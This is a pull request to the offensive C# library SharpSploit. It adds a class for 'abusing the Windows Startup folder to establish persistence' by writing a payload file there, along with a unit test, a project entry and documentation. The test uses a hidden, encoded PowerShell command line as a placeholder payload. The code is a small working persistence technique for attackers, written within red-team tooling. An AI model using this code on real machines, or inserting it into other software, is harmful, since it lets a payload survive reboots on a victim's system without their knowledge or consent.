### PR TITLE
Adds Startup Folder Persistence

### DIFF
--- a/SharpSploit.Tests/SharpSploit.Tests/Persistence/StartupTests.cs
+++ b/SharpSploit.Tests/SharpSploit.Tests/Persistence/StartupTests.cs
@@ -1,0 +1,26 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using System.IO;
+using Microsoft.VisualStudio.TestTools.UnitTesting;
+
+using SharpSploit.Persistence;
+
+namespace SharpSploit.Tests.Persistence
+{
+    [TestClass]
+    public class StartupTests
+    {
+        [TestMethod]
+        public void InstallStartupScript()
+        {
+            string Payload = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -enc <blah>";
+            Startup.InstallStartup(Payload);
+
+            string FilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + $@"\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat";
+            Assert.IsTrue(File.Exists(FilePath));
+        }
+    }
+}

--- a/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
+++ b/SharpSploit.Tests/SharpSploit.Tests/SharpSploit.Tests.csproj
@@ -63,6 +63,7 @@
     <Compile Include="Execution\ShellTests.cs" />
     <Compile Include="LateralMovement\DCOMTests.cs" />
     <Compile Include="LateralMovement\WMITests.cs" />
+    <Compile Include="Persistence\StartupTests.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
   </ItemGroup>
   <ItemGroup>

--- a/SharpSploit/Persistence/Startup.cs
+++ b/SharpSploit/Persistence/Startup.cs
@@ -13,27 +13,24 @@ namespace SharpSploit.Persistence
     public class Startup
     {
         /// <summary>
-        /// Writes a payload into the current users startup folder.
+        /// Installs a payload into the current users startup folder.
         /// </summary>
         /// <author>Daniel Duggan (@_RastaMouse)</author>
-        /// <returns>Bool. True if execution succeeds, false otherwise.</returns>
-        /// <param name="FileName">Defaults to "startup.bat"</param>
-        /// <param name="Payload">The payload to run.</param>
+        /// <param name="Payload">Payload to write to a file.</param>
+        /// <param name="FileName">Name of the file to write. Defaults to "startup.bat"</param>
+        /// <returns>True if execution succeeds, false otherwise.</returns>
         public static bool InstallStartup(string Payload, string FileName = "startup.bat")
         {
             try
             {
                 string FilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + $@"\Microsoft\Windows\Start Menu\Programs\Startup\{FileName}";
                 File.WriteAllText(FilePath, Payload);
-
                 return true;
             }
-
             catch (Exception e)
             {
                 Console.Error.WriteLine("Failed: " + e.Message);
             }
-
             return false;
         } 
     }

--- a/SharpSploit/Persistence/Startup.cs
+++ b/SharpSploit/Persistence/Startup.cs
@@ -1,0 +1,40 @@
+﻿// Author: Ryan Cobb (@cobbr_io)
+// Project: SharpSploit (https://github.com/cobbr/SharpSploit)
+// License: BSD 3-Clause
+
+using System;
+using System.IO;
+
+namespace SharpSploit.Persistence
+{
+    /// <summary>
+    /// Startup is a class for abusing the Windows Startup folder to establish peristence.
+    /// </summary>
+    public class Startup
+    {
+        /// <summary>
+        /// Writes a payload into the current users startup folder.
+        /// </summary>
+        /// <author>Daniel Duggan (@_RastaMouse)</author>
+        /// <returns>Bool. True if execution succeeds, false otherwise.</returns>
+        /// <param name="FileName">Defaults to "startup.bat"</param>
+        /// <param name="Payload">The payload to run.</param>
+        public static bool InstallStartup(string Payload, string FileName = "startup.bat")
+        {
+            try
+            {
+                string FilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + $@"\Microsoft\Windows\Start Menu\Programs\Startup\{FileName}";
+                File.WriteAllText(FilePath, Payload);
+
+                return true;
+            }
+
+            catch (Exception e)
+            {
+                Console.Error.WriteLine("Failed: " + e.Message);
+            }
+
+            return false;
+        } 
+    }
+}

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -1189,6 +1189,20 @@
             <param name="CLSID">Missing CLSID to abuse.</param>
             <param name="ExecutablePath">Path to the executable payload.</param>
         </member>
+        <member name="T:SharpSploit.Persistence.Startup">
+            <summary>
+            Startup is a class for abusing the Windows Startup folder to establish peristence.
+            </summary>
+        </member>
+        <member name="M:SharpSploit.Persistence.Startup.InstallStartup(System.String,System.String)">
+            <summary>
+            Writes a payload into the current users startup folder.
+            </summary>
+            <author>Daniel Duggan (@_RastaMouse)</author>
+            <returns>Bool. True if execution succeeds, false otherwise.</returns>
+            <param name="FileName">Defaults to "startup.bat"</param>
+            <param name="Payload">The payload to run.</param>
+        </member>
         <member name="T:SharpSploit.PrivilegeEscalation.Exchange">
             <summary>
             Exchange is a class for abusing Microsoft Exchange for privilege escalation.

--- a/SharpSploit/SharpSploit.xml
+++ b/SharpSploit/SharpSploit.xml
@@ -1196,12 +1196,12 @@
         </member>
         <member name="M:SharpSploit.Persistence.Startup.InstallStartup(System.String,System.String)">
             <summary>
-            Writes a payload into the current users startup folder.
+            Installs a payload into the current users startup folder.
             </summary>
             <author>Daniel Duggan (@_RastaMouse)</author>
-            <returns>Bool. True if execution succeeds, false otherwise.</returns>
-            <param name="FileName">Defaults to "startup.bat"</param>
-            <param name="Payload">The payload to run.</param>
+            <param name="Payload">Payload to write to a file.</param>
+            <param name="FileName">Name of the file to write. Defaults to "startup.bat"</param>
+            <returns>True if execution succeeds, false otherwise.</returns>
         </member>
         <member name="T:SharpSploit.PrivilegeEscalation.Exchange">
             <summary>


### PR DESCRIPTION
Created `SharpSploit.Persistence.Startup` - a class for abusing the Windows Startup folder to establish peristence.

It simply writes a file into the users Startup folder.

One Unit Tests is included.

> Note: I had to upgrade the MSTest NuGet packages to 1.4.0 for it to run on my machine.

![StartupTests](https://user-images.githubusercontent.com/7346521/58765076-d0ef1a80-8566-11e9-87ac-13deb977b664.PNG)

Any feedback, alterations, suggestions etc are welcome.